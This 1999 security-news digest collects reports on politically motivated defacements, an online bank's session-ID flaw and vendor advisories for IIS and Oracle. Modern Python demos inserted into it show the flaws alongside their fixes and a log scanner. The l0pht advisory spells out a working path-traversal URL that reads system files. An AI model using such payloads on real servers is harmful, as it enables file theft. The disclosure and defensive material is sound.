sites being hacked or expressing anti-American sentiments.

Rumors flew thick and fast, among them that NATO had again bombed the
Chinese embassy in Belgrade and that Chinese President Jiang Zemin had
said that China must be prepared to go to war. Another stated that the
intelligence reports provided to NATO prior to the embassy bombing were
supplied by a NATO officer angry with China over its treatment of
Tibet.

A contributor to the page also suggests manning a full-scale attack on
American Web sites, disseminating computer viruses, and attacking the
sites continuously in a method the hackers term "machine-gunning."
Another suggests targeting financial sites.
Copyright 1999 ABC News Internet Ventures

-=-

Washington Post;

[Moderator: Mirrors of these hacks can all be found at
 http://www.attrition.org/mirror/attrition]

http://www.washingtonpost.com/wp-srv/inatl/longterm/balkans/stories/hackers051299.htm

Anti-NATO Hackers Sabotage 3 Web Sites

By Stephen Barr
Washington Post Staff Writer
Wednesday, May 12, 1999; Page A25

Computer hackers protesting NATO's bombing of the Chinese Embassy in
Belgrade sabotaged three U.S. government Web sites, Clinton
administration officials said yesterday.

The hackers placed anti-NATO messages on Web pages operated by the
Energy Department, the Interior Department and one Interior bureau, the
National Park Service. The cyber-attacks late Sunday forced the Energy
Department and the Park Service to shut down their home pages for much
of Monday.

The Interior Department hacker "was traced back to China by DOI
computer experts," said Interior spokesman Tim Ahearn. "The FBI is
looking into it now."

Energy spokeswoman Michelle Del Valle said, "We don't know who did it,"
but she noted that "the hackers claimed in a message that they were
Chinese." She said the DOE has started an investigation.

The officials said the Web pages were pulled off line quickly after the
sabotage was discovered. Electronic firewalls protected other parts of
the departmental computer systems from attack, they said.

Del Valle said hackers placed the following message, with parts in
imperfect English, on the DOE's site:

"Protest U.S.A.'s Nazi action! Protest NATO's brutal action! We are
Chinese hackers who take no cares about politics. But we can not stand
by seeing our Chinese reporters been killed which you might have know.
Whatever the purpose is, NATO led by U.S.A. must take abosolute
responsibility. You have owed Chinese people a bloody debt which you
must pay for. We won't stop attacking until the war stops!"

NATO bombed the Chinese Embassy in Belgrade on Saturday, killing three
people, including at least one journalist.
U.S. and NATO officials said the bombing was an accident caused by
reliance on an outdated map.

At Interior, Ahearn said hackers sabotaged the home page about 10 p.m.
Sunday, replacing photographs and information with "pictures of Asian
people and Chinese writing." It took about five hours to take the page
off the Web, restore data and bring it back on line.

Another federal Web site - Recreation.gov - was hit April 30 and was
down until May 3, Ahearn said.

The White House Web site was shut down Monday night after attempts were
made Monday morning to hack into the system. White House spokesman
Barry Toiv said it was shut down through last night to try to determine
whether hackers tampered with the White House computer system. Toiv
said he did not know who was responsible.

-o-

Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

05.0 "The Egg" `Cracked'.
     ~~~~~~~~~~~~~~~~~~~~

The Egg, Cracked

From HNN http://www.hackernews.com/

contributed by Code Kid

A UK internet savings bank known as the Egg, owned by Prudential, was
the victim of a security flaw that allowed some users to see other
users confidential financial information. The article goes on to
explain a classic example of poor implementation. Just because they use
encryption does not mean that they are secure. The bank claims that
they have solved the problem.

BBC
http://news.bbc.co.uk/hi/english/business/the_company_file/newsid_337000/337975.stm

Business: The Company File

Crack in Egg's security

It's security, but not as you'd want it

UK Internet savings bank Egg, owned by Prudential, has rushed to close
a security flaw that allowed some users to see other potential savers'
confidential financial information.

Egg did not make the security flaw public, but BBC News Online was
alerted to the problem by two of its readers. One of them called the
lack of security "very worrying".
New site with flaws

The fault developed 10 days ago when Egg moved its operations fully to
the Internet and relaunched its Website with new technology.

Several people who tried to apply online for an Egg account, suddenly
saw somebody else's application flash up on the screen - including
confidential information like home address, phone numbers, e-mail
address, the amount of money to be invested and other details.

Two shocked customers alerted Egg to the problem, whose IT team then
desperately tried to track down the fault. Peter Marsden, IT director
at Egg, told BBC News Online that the flaw was corrected during the
afternoon of the same day.

Encryption breaches security

Ironically, the problem was triggered by Egg's own security measures.

People who try to apply for an Egg account are asked to log on to the
system by identifying themselves with their e-mail address and a
password. This information is then encrypted and used to 'log the
session', i.e. make sure that the computer makes the right connection
between the Internet user and its own electronic records.

However, the new system was not configured to cope with long e-mail
addresses. Every e-mail address longer than about 30 letters was
automatically truncated. Because of the encryption process, people with
long, albeit very different e-mail addresses, could end up with
identical IDs.

The flaw became apparent when, for example, mandatory sections in the
application form were not filled in correctly and Egg's web server sent
back the page demanding additional information. At this point, a page
containing confidential information could be sent to somebody else with
the identical ID.

If hackers had been aware of the security flaw, they could have
deliberately flooded Egg's servers, identifying themselves with long,
but false e-mail addresses, hoping to glean personal information of Egg
customers.

Egg has now ironed out the problem and changed the system so it can
cope with e-mail addresses of any length.
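The truncation flaw in the BBC story can be modelled in a few lines. This is an added example, not Egg's code or anything from the article: the 30-character limit is the article's, while the hash-based ID derivation, the random-token session store and the sample addresses are constructed for illustration.

```python
# Added example (not Egg's or the BBC's code). Two applicants whose e-mail
# addresses agree in the first 30 characters get the same session ID when
# the address is truncated before it is hashed; the same derivation over the
# full address, or a random server-side token, keeps the sessions apart.
import hashlib
import secrets

TRUNCATE_AT = 30  # the article's "longer than about 30 letters"


def session_id_truncated(email: str) -> str:
    """Flawed derivation (constructed stand-in for Egg's 'encryption'):
    the address is cut to TRUNCATE_AT characters before hashing, so any
    two addresses sharing that prefix map to one ID."""
    return hashlib.sha256(email[:TRUNCATE_AT].encode()).hexdigest()[:16]


def session_id_full(email: str) -> str:
    """The fix the article describes: the whole address, whatever its
    length, goes into the derivation."""
    return hashlib.sha256(email.encode()).hexdigest()[:16]


def find_collisions(emails, derive):
    """Group distinct addresses that derive to the same session ID.
    Returns {session_id: [addresses]} for every ID shared by >1 address."""
    by_id: dict[str, list[str]] = {}
    for e in emails:
        by_id.setdefault(derive(e), []).append(e)
    return {sid: es for sid, es in by_id.items() if len(es) > 1}


class SessionStore:
    """Constructed server-side session table. The session key is a random
    token the server hands out, not anything derived from the applicant's
    identity, so no two applicants can share a session however similar
    their addresses are."""

    def __init__(self) -> None:
        self._owner: dict[str, str] = {}

    def create(self, email: str) -> str:
        token = secrets.token_urlsafe(32)
        self._owner[token] = email
        return token

    def owner(self, token: str):
        return self._owner.get(token)


def sessions_are_isolated(emails) -> bool:
    """True if every applicant gets a distinct token that maps back only
    to that applicant."""
    store = SessionStore()
    tokens = [store.create(e) for e in emails]
    return len(set(tokens)) == len(emails) and all(
        store.owner(t) == e for t, e in zip(tokens, emails))


# Constructed sample: the first two addresses share their first 30
# characters ("firstname.lastname.department@") and differ only after that.
SAMPLE_EMAILS = [
    "firstname.lastname.department@example-corp.co.uk",
    "firstname.lastname.department@example-corp.com",
    "short@example.org",
]

if __name__ == "__main__":
    print("truncated:", find_collisions(SAMPLE_EMAILS, session_id_truncated))
    print("full:     ", find_collisions(SAMPLE_EMAILS, session_id_full))
    print("random tokens isolated:", sessions_are_isolated(SAMPLE_EMAILS))
```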
Online, and growing

The Egg savings account has been a phenomenal success, exceeding the
wildest expectations of parent company Prudential. Within six months
the company managed to reach its five-year target, with 500,000
customers who have put £5bn in its accounts.

To help its customers to get online, the Egg has launched a free
Internet access service, similar to Dixon's successful Freeserve.

However, the success has come at a price. The Egg venture is losing
millions, and Prudential does not expect it to make money for some
years.

@HWA

06.0 Student changes grades
     ~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Student Changes Grades

contributed by Weld Pond

An unidentified student of Douglas County High School has admitted to
breaking into the school's computer system and changing the grades of
four students. Sgt. Attila Denes, spokesman for the Douglas County
sheriff called their technique "ingenious". Of course the article does
not give any technical details. The student has been suspended for 10
days, may face expulsion and criminal charges including forgery, use of
forged academic records and criminal tampering.

Inside Denver
http://insidedenver.com/news/0507hack1.shtml

Boy admits altering Douglas High grades

By Tillie Fong
Denver Rocky Mountain News Staff Writer

CASTLE ROCK -- Four Douglas County High School students decided last
month they could hack their way into better grades, authorities said
Thursday.

One 16-year-old boy broke into the school's record system and raised
some low marks.

"The technique they used was ingenious," said Sgt. Attila Denes,
spokesman for the Douglas County sheriff.

The hacker figured out a way to get access to records via the school's
library computer and fax machine. He also used commercially available
software to obtain the password.

The boy apparently got into the system at least 30 times starting in
mid-April.
"He changed an average of two to three grades for each student and
changed the failing or near failing grades to A's and B's," Denes said.

On April 30, school employee Joan Elderton noticed that several changes
were made to four students' grades without authorization, and notified
assistant principal Ron England.

Bruce Caughey, spokesman for Douglas County schools, said one of the
things that gave the hacker away was the time and date log the computer
system keeps.

"School officials were able to determine when the changes were made,"
he said.

That same day, administrators called in the hacker and his father.

"The student initially denied everything," Denes said.

But the following Monday, he submitted a letter to school officials in
which he admitted making the changes and described how he did it. At
that time, he also said he had altered the grades for three other
students.

"The school administrator subsequently talked to the other three boys,
and they each said that they had asked this other boy to change the
grades on their behalf," Denes said.

Since then, the hacker has been suspended for 10 days, and the other
three students for five days. They also face criminal charges, and
possible expulsion.

Possible charges against the hacker include forgery, use of forged
academic records and criminal tampering. The other three boys are
looking at criminal solicitation and use of forged academic records
charges.

None of the boys was named because of their age.

"The students showed quite a bit of resourcefulness," said Denes. "It's
too bad it couldn't have been channeled more positively."
May 7, 1999

@HWA

07.0 IBM's Gift To Australia's Security
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

IBMs Gift to Australias Security

contributed by photon

It is hard to tell if it is the person being written about or the
reporter doing the writing but this "news article" makes it seem that
Guy Denton was sent from IBM to save all of Australia from cyber
attacks. A prime example of sensationalistic advertising hiding as
"news".

The Sydney Morning Herald
http://www.smh.com.au/news/9905/08/text/national4.html

Hacker tracker plays a risky game

Date: 08/05/99

By JAMES WOODFORD, Science Writer

Guy Denton is the hackers' policeman, the keeper of knowledge so
central to our society that should he change sides he would be one of
the most dangerous men on Earth.

His job is to enter other people's computer systems, detect the
presence of illegal hackers, prevent systems from being attacked and to
slowly - when students have proven they can be trusted - teach a new
generation of "ethical" hackers how to hunt down bad guys in
cyberspace.

An ethical hacker is a computer expert who legally enters clients'
computer systems searching for chinks in security.

Mr Denton said hacking is the "getting of any information that you do
not have the right to see".

It is also the wreaking of havoc within computer systems by entering
and changing codes so that a company or bureaucracy's business is
disrupted.

Mr Denton, 40, an American, is in Australia to take a new crop of IBM
recruits to higher levels of anti-hacking skills.

The company searches for talented university graduates with the right
skills to become professional ethical hackers with the right
psychological makeup to ensure that the skills they are taught are not
misused.

Mr Peter Watson, an ethical hacker also with IBM, said: "We tend to
stay away from people who hold themselves out as hackers.
"But we look for certain personality traits - puzzle-solving ability,
inquisitiveness - people who are not comfortable until they have been
all the way through something.

"They are people who have got to have the full picture."

They are also young - most, said Mr Watson, were in their mid-20s.

"If you look back through history we have always had things like the
Silk Road," Mr Watson said. "They were always exposed to bandits and
pirates and you are really just seeing our trade routes moved to an
electronic basis.

"We are the security guards of the Internet."

The Australian team of ethical hackers - their numbers are a closely
guarded secret - work out of a darkened room on Sydney's Lower North
Shore with a bank of computers from where just about any computer
system in the world can be accessed.

Companies concerned about the security of their systems pay a fee of
between $15,000 and $40,000 plus costs to allow the ethical hackers to
break into their network.

"In some circumstances they don't tell their computer system
administrators that there is a hack going on," Mr Denton said.

Once the ethical hackers have entered the system they then wait to see
how long it takes for their presence to be detected or whether once it
is detected proper procedures are followed.

If the "attack" is not detected at all, then advice is given to the
client on the installation of a "warning intrusion alarm system" or an
upgrading of security.

"The level of activity is occurring a lot more," Mr Watson said. "We
are starting to see a lot of activity."

Until recently most hacking activity in Australia tended to take place
after hours, when people had left work or university students had
finished their day's study.

However, as more people from overseas are realising that Australia is a
promising hacking target, the intrusions are occurring more on a
24-hour basis as people dial in from places like the United States.
Hackers are able to access a company's computer system by calling in
externally and then using programs to actually enter the systems.

Advice on how to enter computer systems is readily available on the
Internet and magazines give tips on how to enter various systems.
Computer hacking programs are also now being sold illegally.

However, in spite of the increasing sophistication being employed by
hackers, by far the biggest volume of intrusions are what are described
as "script kiddies".

The greatest fear for the ethical hacker is the anonymous computer whiz
or somebody hell bent on mischief working from within.

"A rogue employee typically does not make themselves known," said Mr
Denton.

The ethical hackers acknowledge that their work gives them the power to
cause huge problems for society and have to work ensuring that the
staff they train do not cross the line to illegality.

"I could cause a huge amount of chaos," Mr Denton said. "But I am not
going to do that.

"We have to be sure that our guys are not going to get bored and do
things they are not supposed to do."

@HWA

08.0 SCREAM busted
     ~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by scream

SCREAM Busted

Last Friday HNN reported that S C R E A M a member of H.A.R.P (Hackers
Against Racist Parties) and well known for his fight against racism and
fascism had been apprehended by law enforcement. HNN has received
confirmation of this earlier report. The FBI questioned SCREAM for 27
hours about 26 different security breaches and his ethics on
hate-groups. It is unknown if he has been charged with a crime.

@HWA

09.0 Corel Hacked
     ~~~~~~~~~~~~

From http://www.net-security.org/

COREL HACKED

by BHZ, Tuesday 11th May 1999 on 5:10 pm CET

Several of Corel domains have been compromised by Team Sploit. Hackers
convict NATO attack on Chinese embassy in Belgrade. "whew. when i heard
the news about NATO bombing the Chinese embassy in Serbia, i thought
heaven was falling down...
^Oh, sorry, it was a mistake", was the explanation we heard from NATO
spokesmen^". See archive of www.corel.com below

http://www.net-security.org/spec/hack/corel.com.htm

@HWA

10.0 G0at Security calls it quits
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

G0AT QUITS

by BHZ, Tuesday 11th May 1999 on 2:58 pm CET

G0at security is officially finished. They had some problems (including
wiping of their server, fights between members, taking of their EffNet
channel #feed-the-goats...). Their earlier hacks are stored on
Attrition mirror. Read finishing statement by Debris below

///////////////////////////////////////////
 GGGGGG   OOOOOOO   AAAAAAAA   TTTTTTTTTT
G        O       O  A      A       TT
G  GGG   O       O  AAAAAAAA       TT
G    G   O       O  A      A       TT
 GGGGGG   OOOOOOO   A      A       TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Due to recent events, the downfall of g0at security has become
imminent. These incidents include:

- Legal problems of some of our members.
- Recent hacking crack downs launched by many governments.
- The recent takeover of our channel, #feed-the-goats (Efnet).
- Losing our server due to a sloppy hack by one of our members (/me
  looks away).
- Losing our text files due to our domain being wiped off the server.
- Fights and disappearances of some of our members.
- The maturing of our members.

g0at security hereby announces its closure. By this we do not mean we
are going legit, we are finished. Unlike other groups we most likely
will not spawn back.

[Brief history of g0at security]

One day in Feb. I believe, ech0 and myself (Debris), decided to irc.
ech0 informed me that he occasionally hung out in a channel he, himself
created called #feed-the-goats. From there, members of a popular group,
HcV along with members of Global Hell, began coming. ech0 and myself
decided that we wanted to be as elite as our peers in #rootworm, so we
made a webpage. The purpose of the page was to mock and satirize hacker
culture in general.
Our first document entitled "g0at declares war on LoU" mocked the
Legion of the Underground's new attempt at becoming legit among a
handful of other aspects of their organization. Our original url
(goat.sphix.com) quickly grew in size and popularity, and our channel
became more populated. The hacks began soon after, some by members and
a lot by non-members. g0at's highpoint came soon after the
controversial yahoo hack. Our popularity skyrocketed and the name g0at
became known to all (unfortunately we got all the l33t0s in our channel
and wouldn't go away). The fun and games continued up until April, when
all the 'incidents' began. Then May was the last straw.

[Where do we go from here]

Most members will most likely go their own ways. Many still hang in
#feed-the-goatz (our new channel). No more text releases will come from
g0at, our webpage will remain down, our archive on attrition.org will
stay the same and nothing will be heard of us as a group.

[Thanks and greets]

Thanks to all that supported our group and enjoyed the text we wrote to
amuse the unintelligent. Greets to all our 12 members, HNN, attrition,
net-security, HWA.hax0r.news. JP, for entertaining us for hours with
your hacker journalism. And thanks to all the rest.

Finally.... it's been fun. It's been awesome being associated with
g0at.
You can still reach us at g0at@attrition.org for further questions or
comments or whatever (I just want email)

g0at---------------------------------------------------------------------------------------------

[]=Debris=[]
debris@attrition.org

@HWA

11.0 Guninski uncovers yet another browser bug
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

ANOTHER BROWSER VULNERABILITY

by BHZ, Tuesday 11th May 1999 on 2:52 pm CET

Georgi Guninski reports another browser bug to BugTraq: "There is a
design flaw in both Internet Explorer 5.0 and Netscape Communicator
4.51 Win95 (guess all 4.x versions of both browsers are vulnerable too)
in the way they handle bookmarks. The problem arises if the user
bookmarks (adds to favorites) and later chooses a specially designed
javascript: URL. When the bookmark is chosen later, the JavaScript code
in it is executed in the context (the same domain and protocol) of the
document opened prior to choosing the bookmark. So, the JavaScript code
has access to documents in the same domain. An interesting case is
choosing the bookmark when the active document is a local file (the
protocol is "file:") - then the JavaScript code has access to local
files and directories".

@HWA

12.0 Freaky to do a Macintosh related speech at Defcon7
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

FREAKY'S DEFCON7 SPEECH

by LucasAr, Tuesday 11th May 1999 on 2:30 pm CET

As you probably know Freaky will be giving a first time ever Macintosh
security related speech on DEFCON7. You can read his announcement and
the topics he plans to address below, and I urge you to visit Freaks
Macintosh Archives.

http://freaky.staticusers.net/

Freaks Macintosh Archives Author Freaky will be speaking at this year's
Hacker Convention located in Las Vegas, NV called DefCon 7

This is the first speech of its kind dealing with the MacOS and its
security.
We plan on covering the following topics:

Macintosh Security Products: OnGuard, FileGuard, Screen 2 Screen,
FoolProof, AtEase

Macintosh Underground Products: Such as programs to destruct a security
product or cause another computer to crash (Denial of Service Attack)

We will also cover how macs are vulnerable to DoS attacks. And release
new programs for the Mac Platforms.

Freaks Macintosh Archives
http://freaky.staticusers.net/

@HWA

13.0 IIS 2.0 "Security" by p0lix
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

Originally posted on http://www.403-security.org/

IIS 2.0 "Security"

Microsoft is wrestling with security holes in its Site Server and
Internet Information Server (IIS) products that expose system files --
including potentially sensitive Internet-commerce customer files or
databases -- through any remote web browser.

The flaws, discovered by members of l0pht are caused from default
configurations that install three active server pages without proper
access control list settings.

LOpht has warned that E-commerce server information -- including
transaction logs, credit card numbers, and other customer information
-- are potentially at risk. "There is even E-commerce shopping cart
software that stores administrative passwords in simple text files,"
LOpht warned.

Using these active server pages -- viewcode.asp, codebrws.asp, and
showcode.asp -- someone could view sensitive or compromising
information from that system.

The problem affects Versions 3.x of Site Server and 4.x of IIS; both
are used in E-commerce infrastructures.

It's bad if you've got an e-commerce database installed on that system,
because almost anyone can use Active Server Pages to locate databases
and get into database information, and you can also view the source
code of HTML pages.

A WebTrends engineer found that the holes were so wide he could use
them on an Internet search engine and determine what servers were
similarly configured.
He was able to view the parameters of any file and you can get
information that will lead you through all the systems throughout the
network.

Microsoft officials were working on new versions of the tools to
correct the vulnerability, which security product manager Scott Culp
said should be complete by early next week, and planned to issue a
security bulletin on the issues Friday afternoon.

In the meantime, potential workarounds include checking the Active
Server Pages settings, or deleting the tools altogether.

As a Web site operator, you want to give customers the opportunity to
look at the code on their page, however, this vulnerability allows
somebody to misuse these tools to possibly look at other files on the
server.

For more information visit the l0pht web site at http://www.l0pht.com

-p0liX (p0lix@403-security.org)

@HWA

14.0 l0pht Security Advisory on MS IIS 4.0
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

L0pht Security Advisory
-------------

URL Origin:    http://www.l0pht.com/advisories.html
Release Date:  May 7th, 1999
Application:   Microsoft IIS 4.0 Web Server
Severity:      Web users can view ASP source code and other sensitive
               files on the web server
Author:        weld@l0pht.com
Operating Sys: Microsoft NT Server 4.0

--------------

I. Description

Internet Information Server (IIS) 4.0 ships with a set of sample files
to help web developers learn about Active Server Pages (ASP). One of
these sample files, showcode.asp, is designed to view the source code
of the sample applications via a web browser.

The showcode.asp file does inadequate security checking and allows
anyone with a web browser to view the contents of any text file on the
web server. This includes files that are outside of the document root
of the web server.

Many ecommerce web servers store transaction logs and other customer
information such as credit card numbers, shipping addresses, and
purchase information in text files on the web server.
This is the type of data that could be accessed with this
vulnerability.

The L0pht would like to thank Parcens for doing the initial research on
this problem.

II. Details

The showcode.asp file is installed by default at the URL:

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp

It takes 1 argument in the URL, which is the file to view. The format
of this argument is:

source=/path/filename

So to view the contents of the showcode.asp file itself the URL would
be:

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp

This looks like a fairly dangerous sample file. It can view the
contents of files on the system. The author of the ASP file added a
security check to only allow the viewing of the sample files which were
in the '/msadc' directory on the system. The problem is the security
check does not test for the '..' characters within the URL. The only
checking done is if the URL contains the string '/msadc/'. This allows
URLs to be created that view, not only files outside of the samples
directory, but files anywhere on the entire file system that the web
server's document root is on.

For example, a URL that will view the contents of the boot.ini file,
which is in the root directory of an NT system is:

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini

This URL requires that IIS 4.0 was installed in its default location.

III. Solution

For production servers, sample files should never be installed so
delete the entire /msadc/samples directory. If you must have the
showcode.asp capability on development servers the showcode.asp file
should be modified to test for URLs with '..' in them and deny those
requests.
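The advisory's point is that a substring test for '/msadc/' is not a path check. The following is an added example, not l0pht's or Microsoft's code: it puts the substring check the advisory describes next to a replacement that canonicalises the path before comparing it to the samples prefix, and runs both over a few constructed IIS-style log lines so an administrator can see which past requests the original check would have served. The log format, client addresses and helper names are constructed assumptions.

```python
# Added example (not from the advisory). Models showcode.asp's 'source='
# check, the hardened replacement, and a log triage pass over constructed
# W3C-style IIS log lines. Only boot.ini, taken from the advisory, is used as
# a traversal target.
import posixpath
from urllib.parse import unquote

SAMPLES_PREFIX = "/msadc/"


def allowed_by_showcode_check(source: str) -> bool:
    """The check the advisory describes: the request is accepted as long as
    the literal string '/msadc/' appears somewhere in the parameter. '..'
    segments are never examined, so they are free to climb out of the tree."""
    return SAMPLES_PREFIX in source


def allowed_by_hardened_check(source: str) -> bool:
    """Replacement check (constructed): decode once, refuse backslashes and
    NULs, normalise the path so every '.' and '..' is resolved, and only
    then require the *canonical* path to lie under the samples prefix."""
    source = unquote(source)
    if "\\" in source or "\x00" in source or not source.startswith("/"):
        return False
    canonical = posixpath.normpath(source)
    # normpath drops leading '..' at the root, so a traversal that climbs
    # past '/' comes back as e.g. '/boot.ini' and fails the prefix test.
    if ".." in canonical.split("/"):
        return False
    return canonical.startswith(SAMPLES_PREFIX) and canonical != SAMPLES_PREFIX


def suspicious_showcode_requests(log_lines):
    """Detection pass for administrators: return (client, source) pairs for
    showcode.asp requests the hardened check would reject. Assumed log
    layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7 or not parts[4].lower().endswith("showcode.asp"):
            continue
        client, query = parts[2], parts[5]
        for field in query.split("&"):
            if field.lower().startswith("source="):
                source = field[len("source="):]
                if not allowed_by_hardened_check(source):
                    hits.append((client, unquote(source)))
    return hits


# Constructed sample log: a legitimate sample-file view followed by the
# traversal request shown in the advisory, and an unrelated page hit.
SAMPLE_LOG = [
    "1999-05-10 10:01:02 192.0.2.10 GET /msadc/Samples/SELECTOR/showcode.asp "
    "source=/msadc/Samples/SELECTOR/showcode.asp 200",
    "1999-05-10 10:01:09 192.0.2.10 GET /msadc/Samples/SELECTOR/showcode.asp "
    "source=/msadc/Samples/../../../../../boot.ini 200",
    "1999-05-10 10:02:30 192.0.2.11 GET /default.htm - 200",
]

if __name__ == "__main__":
    traversal = "/msadc/Samples/../../../../../boot.ini"
    print("original check serves traversal:", allowed_by_showcode_check(traversal))
    print("hardened check serves traversal:", allowed_by_hardened_check(traversal))
    print("suspicious requests in log:", suspicious_showcode_requests(SAMPLE_LOG))
```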
For specific questions about this advisory, please contact
weld@l0pht.com

---------------
For more L0pht (that's L - zero - P - H - T) advisories check out:
http://www.l0pht.com/advisories.html
---------------

@HWA

15.0 X-Force Security advisory on Oracle 8: Multiple file system vulnerabilities
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security Advisory
May 6, 1999

Multiple File System Vulnerabilities in Oracle 8

Synopsis:

Internet Security Systems (ISS) X-Force has discovered that multiple
vulnerabilities exist in Oracle 8 that may allow local attackers to
exploit weaknesses in Oracle administrative tools. Oracle is the market
leader in enterprise database solutions. Attackers may use these
vulnerabilities to amplify their privilege to that of the 'oracle'
user. By default, the oracle user controls the entire Oracle database
system. Attackers may launch local denial of service attacks against
the database as well as alter or manipulate data.

Affected Versions:

ISS X-Force has determined that most current versions of Oracle 8 for
Unix are vulnerable. These versions include 8.03, 8.04, 8.05, and 8.15.
Oracle 8 for Windows NT is not affected by these vulnerabilities.

Description:

The Oracle 8 distribution is shipped with many administrative utilities
that are owned by the oracle user with the setuid bit enabled. Several
of these utilities implement insecure file creation and manipulation.
These utilities also trust Oracle-related environment variables. The
combined effect of these vulnerabilities may allow local attackers to
create, append to, or overwrite privileged oracle files. Certain
vulnerabilities exist that may allow local attackers to execute
arbitrary commands as the oracle user. Attackers may also be able to
permanently elevate their privilege to that of the oracle user.

Temporary files that follow symbolic links are a common source of
vulnerabilities in setuid executables.
Administrators should remove or restrict access to setuid executables if
possible. Developers of setuid programs need to take special precautions to
prevent the introduction of vulnerabilities of this nature. ISS X-Force
recommends that all Unix developers become familiar with Matt Bishop's
secure programming guide, available at
http://olympus.cs.ucdavis.edu/~bishop/secprog.html

Fix Information:

ISS X-Force has worked with Oracle to provide a patch for the
vulnerabilities described in this advisory. Oracle has provided the
following FAQ to answer any questions concerning these vulnerabilities.

Q: I've heard about a setuid security issue with the Oracle database? What
is this all about?

A: On Unix platforms, some executable files have the setuid bit on. It may
be possible for a very knowledgeable user to use these executables to
bypass your system security by elevating their operating system privileges
to that of the Oracle user.

Q: Which releases are affected by this problem?

A: This problem affects Oracle data server releases 8.03, 8.0.4, 8.0.5, and
8.1.5 on Unix platforms only.

Q: Can I correct this problem or do I need a patch?

A: This problem can easily be corrected. The customer can download the
patch from the Oracle MetaLink webpages at
http://www.oracle.com/support/elec_sup. The patch is a Unix shell script.
This shell script should be run immediately, and also run after each relink
of Oracle.

Q: What is Oracle doing to fix this problem?

A: Effective immediately, Oracle will provide the patch on Oracle's
Worldwide Support Web pages. Oracle will ensure the patches are
incorporated into future releases of Oracle8i (8.1.6) and Oracle8.0 (8.0.6)

Q: What is Oracle doing to notify users about this problem now?

A: Oracle is notifying all supported customers, via the Oracle Worldwide
Support Web pages, of this issue so they can address it as required.
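The temp-file weakness the advisory describes and the precaution a setuid developer takes against it, as an added example for this digest (not ISS's or Oracle's code; every file name is constructed and the whole run stays inside a throwaway directory, so nothing privileged is touched). Python stands in here for the C a real setuid tool would be written in; the flags are the same ones open(2) takes.

```python
# Added example, not from the ISS advisory or Oracle: why a setuid tool must
# not open() a predictable temp name, and the O_CREAT|O_EXCL|O_NOFOLLOW
# pattern that refuses a pre-planted symlink. All paths are constructed
# inside a temporary directory that is removed afterwards.
import errno
import os
import shutil
import tempfile


def naive_create(path: str):
    """The weak pattern: open() on an existing name follows a symlink to
    wherever it points, so the write lands in the link's target."""
    return open(path, "w")


def careful_create(path: str):
    """Create the file only if the name does not already exist (O_EXCL) and
    never traverse a symlink at the final component (O_NOFOLLOW); the mode
    is 0600 from the moment the file exists, not fixed up afterwards."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    return os.fdopen(fd, "w")


def run_demo() -> dict:
    """Plant a symlink at a predictable temp name, then try both creators.
    Returns what each one did so the outcome can be checked programmatically."""
    base = tempfile.mkdtemp(prefix="setuid-demo-")
    try:
        # Constructed stand-in for a file only the privileged user may write.
        protected = os.path.join(base, "protected.dat")
        with open(protected, "w") as f:
            f.write("original\n")

        # The predictable name a careless tool would use; an unprivileged
        # user who can guess it links it to the protected file in advance.
        tmp_name = os.path.join(base, "tool.tmp")
        os.symlink(protected, tmp_name)

        # Weak pattern: the write goes through the link into protected.dat.
        with naive_create(tmp_name) as f:
            f.write("clobbered\n")
        with open(protected) as f:
            after_naive = f.read()

        # Safe pattern: the existing (symlink) name is refused outright.
        try:
            with careful_create(tmp_name):
                careful_outcome = "opened"
        except OSError as e:
            careful_outcome = errno.errorcode[e.errno]

        # Safe pattern on a fresh name works and yields a 0600 regular file.
        fresh = os.path.join(base, "fresh.tmp")
        with careful_create(fresh) as f:
            f.write("ok\n")
        fresh_mode = os.stat(fresh).st_mode & 0o777

        return {"after_naive": after_naive,
                "careful": careful_outcome,
                "fresh_mode": fresh_mode}
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print(run_demo())
```

The naive open overwrites the protected file; the careful open fails with EEXIST on the planted link and succeeds only on a name nobody has claimed.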
ISS X-Force also recommends that all administrators complete a proactive
survey on the use or potential misuse of setuid bits on privileged
executables on their systems.

Credits:

These vulnerabilities were primarily researched by Dan Ingevaldson of the
ISS X-Force.

________

Copyright (c) 1999 by Internet Security Systems, Inc.

Permission is hereby granted for the electronic redistribution of this
Security Alert. It is not to be edited in any way without express consent
of the X-Force. If you wish to reprint the whole or any part of this Alert
Summary in any other medium excluding electronic medium, please e-mail
xforce@iss.net for permission.

About ISS

ISS is the pioneer and leading provider of adaptive network security
software delivering enterprise-wide information protection solutions.
ISS' award-winning SAFEsuite family of products enables information risk
management within intranet, extranet and electronic commerce
environments. By combining proactive vulnerability detection with
real-time intrusion detection and response, ISS' adaptive security
approach creates a flexible cycle of continuous security improvement,
including security policy implementation and enforcement. ISS SAFEsuite
solutions strengthen the security of existing systems and have
dramatically improved the security posture for organizations worldwide,
making ISS a trusted security advisor for firms in the Global 2000, 21 of
the 25 largest U.S. commercial banks and over 35 governmental agencies.
For more information, call ISS at 678-443-6000 or 800-776-2362 or visit
the ISS Web site at www.iss.net.

Disclaimer

